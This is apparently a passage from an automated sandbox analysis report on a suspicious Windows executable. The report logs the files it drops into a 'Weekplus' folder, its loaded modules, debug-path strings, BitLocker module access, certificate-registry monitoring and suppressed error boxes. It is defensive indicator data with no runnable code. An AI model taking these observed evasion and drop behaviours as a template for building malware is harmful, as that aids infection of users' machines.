Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\openvr_api.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\mpclient64.dat	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\steam_api64.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Directory created: C:\Program Files\Weekplus\APP.exe	Jump to behavior

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: #U6c47#U8054#U652f#U4ed8.exe

Static file information: File size 23566848 > 1048576

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1675800

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: #U6c47#U8054#U652f#U4ed8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\users\administrator\documents\visual studio 2010\Projects\LMNK\LMNK\obj\x64\Release\LMNK.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005481000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000000.2283294453.0000000000E42000.00000002.00000001.01000000.00000007.sdmp, APP.exe.0.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: XMM556.pdbP source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdbect source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb F source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4103958237.000000002291C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: XMM556.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Users\user\Desktop\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdba$zzzdbg0 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdbx\| source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4105919268.0000000022974000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.PDB_ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\XMM556.pdb.pdb` source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\XMM556.pdb~ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdbh\ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: &#U6c47#U8054#U652f#U4ed8.PDB@ source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 0C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.KeyDistributionService.Cmdlets.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.pdbP source: WER9203.tmp.dmp.7.dr
Source:	Binary string: ".pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Configuration.pdb0 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: indoC:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3965494002.00000000025F0000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.pdb(H<1 source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.ni.pdbRSDSautg source: WER9203.tmp.dmp.7.dr
Source:	Binary string: \??\C:\Windows\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4106685460.00000000229AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdb source: GamePlusPlus.exe, 00000008.00000002.2915979575.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000008.00000000.2422580040.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000000.2424746992.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438005638.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2440476207.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2426709323.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2427594527.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2441404646.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000000.2993619999.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000002.3327812231.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000002.2999470304.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000000.2993923188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000000.2994240888.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000002.3002375188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000000.2994570807.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000002.3000662096.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000000.3593672695.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000002.3917476455.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000002.3606197237.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000000.3594128626.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000000.3594503284.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000002.3602723129.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000002.3607943696.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000000.3594920663.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4107905878.0000000026D20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\buildslave\steamvr_rel_hotfix_win64\build\src\vrdashboard\Retail\win64\2017\vrdashboard.pdbF%% source: GamePlusPlus.exe, 00000008.00000002.2915979575.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000008.00000000.2422580040.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000000.2424746992.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438005638.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000002.2440476207.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000B.00000000.2426709323.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000000.2427594527.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 0000000C.00000002.2441404646.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000000.2993619999.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000010.00000002.3327812231.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000002.2999470304.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000011.00000000.2993923188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000000.2994240888.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000012.00000002.3002375188.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000000.2994570807.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000013.00000002.3000662096.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000000.3593672695.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000016.00000002.3917476455.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000002.3606197237.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000017.00000000.3594128626.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000000.3594503284.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000018.00000002.3602723129.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000002.3607943696.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe, 00000019.00000000.3594920663.00007FF78B892000.00000002.00000001.01000000.0000000C.sdmp, GamePlusPlus.exe.0.dr
Source:	Binary string: System.Core.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: Microsoft.Management.Infrastructure.Native.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: C:\Users\Administrator\documents\visual studio 2010\Projects\XMM556\XMM556\obj\x64\Release\XMM556.pdb source: #U6c47#U8054#U652f#U4ed8.exe
Source:	Binary string: Microsoft.Management.Infrastructure.Native.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Numerics.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: c:\buildslave\steam_rel_client_win64\build\src\steam_api\win64\Release\steam_api64.pdb source: GamePlusPlus.exe, 00000008.00000002.2916136051.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000A.00000002.2438377410.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000B.00000002.2441076000.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 0000000C.00000002.2447989776.00007FF89FDC8000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000010.00000002.3328206103.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000011.00000002.3000557321.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000012.00000002.3002679207.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000013.00000002.3000970184.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000016.00000002.3917776709.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000017.00000002.3608099276.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000018.00000002.3603220709.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, GamePlusPlus.exe, 00000019.00000002.3608644882.00007FF8BFB88000.00000002.00000001.01000000.0000000D.sdmp, steam_api64.dll.0.dr
Source:	Binary string: C:\Windows\XMM556.pdbpdb556.pdb<V) source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4108930101.0000000026D8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER9203.tmp.dmp.7.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9203.tmp.dmp.7.dr

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

8_2_00007FF78B874790

Source: openvr_api.dll.0.dr	Static PE information: section name: .fptable
Source: steam_api64.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF848F100BD pushad ; iretd	0_2_00007FF848F100C1
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF848E2D2A5 pushad ; iretd	3_2_00007FF848E2D2A6
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF848F41290 pushad ; retf	3_2_00007FF848F4159D
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF848F474D8 pushad ; iretd	3_2_00007FF848F474E1
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF848F414E5 pushad ; retf	3_2_00007FF848F4159D
Source: C:\Program Files\Weekplus\APP.exe	Code function: 3_2_00007FF849011EDE pushad ; retf	3_2_00007FF849011FE9

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\openvr_api.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\APP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\steam_api64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File created: C:\Program Files\Weekplus\GamePlusPlus.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
